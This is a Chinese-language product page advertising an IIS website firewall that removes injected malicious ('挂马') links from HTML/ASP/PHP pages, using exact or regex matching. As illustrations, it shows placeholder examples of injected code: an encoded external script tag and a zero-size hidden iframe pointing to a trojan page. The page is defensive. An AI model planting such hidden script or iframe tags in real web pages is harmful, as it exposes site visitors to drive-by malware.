智创网站
专业级防火墙


防黑客入侵、防提权、防创建新用户、文件防篡改
专业级防火墙帮助您抵御各种黑客非法侵害!

导航

实时清除HTML/ASP/PHP/ASP.NET中的“挂马”代码

    • 网站被反复“挂马”,怎么办?

    • 刚刚帮客户清除服务器硬盘 ASP / PHP 文件中的“挂马”代码连接,过一会又被“入侵者”加上,怎么办?

 

    《智创IIS防火墙》帮你解决这个难题,使用“正则表达式”模式匹配“挂马”代码,从 IIS 内存里清除“挂马”代码连接。不用修改硬盘 ASP / PHP 文件,不在担心错误修改客户ASP/PHP文件。

 

    • 对于 <script src=http://%AA%BB%CC%DD%EE%FF%GG></script> 这样的加密URL连接,只需要使用一个“正则表达式”,即可从IIS中过滤整个服务器中类似的“挂马”代码连接。

    • 对于 <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe> 这样的,width=0 height=0 设置为 0 的,也只需要通过“正则表达式”,即可轻松清除。

 

清除"挂马"代码连接目前有两个方式

    • 使用"原样"模式清除,清除指定的木马连接
    • 使用"正则表达式"模式进行清除,可以自己定义“正则表达式”进行清除操作,使用范围更广
 

其他用途一,清除指定“关键字”功能
    从HTML/ASP/PHP/ASP.NET网页清除任意内容,如实现关键字“清除”功能,将指定的关键字从 HTML/ASP/PHP/ASP.NET 网页里清除掉。
其他用途二,清除ASP/PHP木马HTML特征,使木马无法正常运行
    从ASP/PHP文件里,找出一些常见的木马HTML特征,将指定的特征进行清除,使木马成为废品,从而无法正常运行。
 

特别说明,若需要拦截硬盘 HTML/ASP/PHP/ASPX ...等文件被批量挂马,请下载安装《网站文件防篡改助手》软件


    当前功能模块是从 IIS内存里清除指定的挂马连接,使其无法显示出来。若要阻止硬盘 HTML/ASP/PHP/ASPX ...等文件被批量挂马、或被批量修改,请从这里下载《网站文件防篡改助手》软件,下载地址
https://www.zcnt.com/FileSysMon.asp

 

    立刻下载安装《智创网站专业级防火墙软件》 https://www.zcnt.com/iis.asp

 

 

 

如下图所示, 当前网站被加入"挂马"代码连接

 

找出其中的“挂马”代码连接,将挂马连接加入到“挂马代码清除(原样模式)”功能里,每行填写一个挂马代码,如下面的图片

 

我们再次访问网站,挂马连接在IIS里就被清空了,无法显示出来了。

什么意思呢,相当于网页里有 “反清复明”关键字,我们把 反清复明 字符清除掉,就无法显示了。

同样道理,如果是木马挂马链接,我把木马挂马字符清除掉,这个木马挂马链接也无法显示了。

 

 

 

下载地址:

    下载安装《智创网站专业级防火墙软件》 https://www.zcnt.com/iis.asp

 

操作说明

  详细操作步骤,请访问 https://www.zcnt.com/help/HtmlTextRep.asp